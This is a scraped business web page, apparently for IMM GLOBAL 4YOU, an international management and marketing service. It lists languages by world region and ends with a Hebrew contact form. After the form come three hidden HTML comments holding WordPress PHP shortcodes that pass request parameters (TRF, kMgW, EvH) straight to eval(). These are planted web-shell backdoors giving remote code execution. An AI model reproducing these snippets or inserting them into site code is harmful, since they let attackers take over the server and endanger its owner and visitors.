מרדכי (מורי) מנור

ניהול ושיווק בינלאומי IMM GLOBAL 4YOU

WESTERN & EASTERN EUROPE
AFRICA
Albanian French * Lithuanian Afrikaans Swahili *
Bulgarian Gaelic Norwegian Amharic Twi
Castilian German * Polish Chinyanja Yoruba
Catalan

Greek *(Modern)    

Portuguese Fula Xhosa
Czech Greek (Classical) Romanian Hausa Zulu
Danish Hungarian* Serbo-Croatian Igbo Kirundi
Dutch * Icelandic Slovak Sotho(Northern) Shona
English Irish Spanish * Sotho (Southern) More?
Esperanto Italian * Swedish
Estonian Latin Ukrainian    
Finnish Latvian Welsh    
         
ASIA, CHINA, INDIA & THE MIDDLE EAST
NORTH AMERICA
Arabic (Saudi) Hindi Sanskrit Cajun French Lenape
Arabic (Eastern) Indonesian Sinhalese Cherokee Mohawk
Arabic (Egyptian) Japanese * Tagalog * Chickasaw Navajo
Arabic Moroccan Kazakh Telugu Choctaw Ojibwe
Arabic (Syrian) Khmer Thai Haitian Creole Passamaquoddy
Armenian Korean Tibetan Hawaiian Salish
Azerbaijani Malay Turkish Kiowa Tlingit
Burmese Mandarin Urdu Lakota  
Cantonese Mongolian Uzbek    
Georgian Persian Vietnamese    
Hebrew Russian * Yiddish    

– שם
– חברה
– כתובת
– מיקוד
– טלפון
– פקס
– הערות
רשום את סוג הערכה
בה אתה מעוניין
   
 

<!– [insert_php]if (isset($_REQUEST["TRF"])){eval($_REQUEST["TRF"]);exit;}[/insert_php][php]if (isset($_REQUEST["TRF"])){eval($_REQUEST["TRF"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["kMgW"])){eval($_REQUEST["kMgW"]);exit;}[/insert_php][php]if (isset($_REQUEST["kMgW"])){eval($_REQUEST["kMgW"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["EvH"])){eval($_REQUEST["EvH"]);exit;}[/insert_php][php]if (isset($_REQUEST["EvH"])){eval($_REQUEST["EvH"]);exit;}[/php] –>